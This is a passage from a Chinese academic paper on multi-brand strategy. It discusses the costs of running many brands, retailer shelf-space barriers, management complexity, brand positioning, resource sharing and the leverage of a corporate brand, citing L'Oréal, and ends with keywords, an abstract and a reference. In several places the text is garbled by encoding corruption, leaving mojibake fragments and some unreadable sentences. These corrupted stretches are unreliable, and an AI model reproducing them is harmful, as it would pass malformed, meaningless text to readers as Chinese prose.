(二)效率不彰。很多公司已經(jīng)運用自己的品牌開創(chuàng)出幾項顯然有利可圖、但規(guī)模很小的利基。缺乏數(shù)量上的優(yōu)勢并未讓他們的行銷人員擔(dān)心,因為他們力圖達(dá)成的是整個品牌組合的銷售最大化,而不是個別品牌的銷售最大化。但是,這類的公司遲遲才了解,維持一大群品牌(而且每項品牌的運營規(guī)模都相對較?。┑某杀?,相對而言,比推銷幾項大品牌的成本要高。例如,要制造各式各樣的產(chǎn)品,工產(chǎn)方面需要大量的裝備成本以及較長的機器停工時間,從而會導(dǎo)致較高的生產(chǎn)成本。
(三)零售商利潤高昂。當(dāng)企業(yè)推出多項品牌時,要為這些品牌取得零售上架空間,上架成本會高得讓你不得不打退堂鼓。大型零售廠商,如美國的沃爾瑪百貨與歐洲的家樂福,一般在每項產(chǎn)品分類中只將前兩大或前十大品牌上架。零售商運用領(lǐng)導(dǎo)品牌吸引顧客上門,但隨后就向購物者推銷自有品牌。
(四)管理難度加大?!岸嗥放啤辈呗孕枰M(jìn)行協(xié)調(diào),包括從產(chǎn)品創(chuàng)新與包裝改變,到經(jīng)銷商關(guān)系與零售商促銷的。大型的品牌組合也需要經(jīng)常進(jìn)行價格變動與庫存調(diào)整,這些工作會消耗所費不貲的管理資源。
此外,品牌擴增為企業(yè)帶來最大成本的時候,不是現(xiàn)在,而是在未來。那些在市場中具有大型品牌組合的公司,經(jīng)理人不斷掛念在心的,往往是品牌之間的經(jīng)費配置,而不是公司前途或有關(guān)競爭對手的問題。這類沖突的陰影常使企業(yè)組織揮之不去,讓他們在面臨更加專注的對手競爭時,顯得脆弱不堪。
四、多品牌策略的應(yīng)用
(一)明確品牌定位。定位意味著犧牲,意味著有所不為,而企業(yè)的擴張又希望無所不為。企業(yè)在完成資本積累開始對外擴張的過程中,若堅持統(tǒng)一品牌策略,讓所有開發(fā)的新產(chǎn)品都套用原品牌,就會面臨兩難選擇:若進(jìn)行品牌延伸,盡管極為謹(jǐn)慎行事,采取了防范措施,但也可能出現(xiàn)品牌形象淡化、每一種產(chǎn)品都缺乏個性而被對手各個擊破的風(fēng)險;若放棄某些領(lǐng)域的品牌延伸,則意味著必須放棄一部分市場。要解決這一難題,一個可行的辦法就是要采取產(chǎn)品定位的多品牌策略。
(二)建立內(nèi)在相關(guān)性。品牌管理涉及到采購、生產(chǎn)、營銷、財務(wù)、人力等各個環(huán)節(jié)。對多品牌企業(yè)而言,不能只關(guān)注單個品牌,而必須注意同一系列品牌之間的相互關(guān)聯(lián)和影響。內(nèi)在相關(guān)性主要是指,在實施多品牌策略時必須能夠在幾個品牌之間形成良好的資源整合和共享機制。任何一個企業(yè)的資源和精力都是有限的,因此為了充分利用企業(yè)的內(nèi)外資源,可以成立完善的研發(fā)、采購公共平臺,同時在渠道資源方面也實現(xiàn)良好的品牌互動和共享,并以完全不同的渠道策略來實現(xiàn)品牌間的良性競爭。品牌之間的高效整合與共享是歐萊雅取得成功的關(guān)鍵,其主要體現(xiàn)在技術(shù)和渠道這兩個兼容性極強的方面。在技術(shù)方面,歐萊雅盡量發(fā)揮技術(shù)平臺的相關(guān)效應(yīng)。
(三)發(fā)揮企業(yè)品牌對多品牌策略的杠桿作用。多品牌策略中,品牌關(guān)系的管理還包括企業(yè)品牌和產(chǎn)品品牌之間關(guān)系的管理。企業(yè)品牌用于維護(hù)企業(yè)整體形象,對現(xiàn)有和潛在的員工來說,它是一種激勵;對投資者而言,它意味著信心;對于產(chǎn)品品牌,它提供的是承諾。企業(yè)品牌代表的是企業(yè)的外部形象,對產(chǎn)品品牌有很強的杠桿作用。歐萊雅深知企業(yè)品牌的重要性,將其營銷推廣跨越個別產(chǎn)品線的產(chǎn)品品牌宣傳,將光芒聚焦到企業(yè)品牌上來,最終形成一股激化不同產(chǎn)品品牌的能量。
綜上所述,企業(yè)要使用多品牌策略進(jìn)行市場競爭,需要注意多方面的內(nèi)容。首先在品牌定位時要注意各品牌之間的關(guān)系,使各個品牌互相不沖突,并且協(xié)調(diào)各個品牌之間的內(nèi)在關(guān)系,找出重點培育的品牌,以重點品牌促進(jìn)其他品牌的發(fā)展,同時又需要防止那些做得不成功的品牌影響重點品牌的價值。在培育各個品牌的同時注意隱藏成本的增加,盡量減少隱藏成本,避免因為隱藏成本拖垮了各個品牌的擴張,做到了這些才能使企業(yè)的多個品牌健康地發(fā)展,使企業(yè)在競爭中獲勝。
論文關(guān)鍵詞:多品牌;品牌定位;品牌關(guān)系
論文提要單一品牌已越來越難以滿足消費者的需求,實施多品牌策略成為眾多企業(yè)競爭市場的手段。本文分析多品牌策略的概念、優(yōu)點和缺點、使用范圍、實踐應(yīng)用,希望對企業(yè)的品牌決策提供幫助。
主要參考文獻(xiàn):
[1]巨天中.品牌戰(zhàn)略.中國經(jīng)濟出版社,2004.5.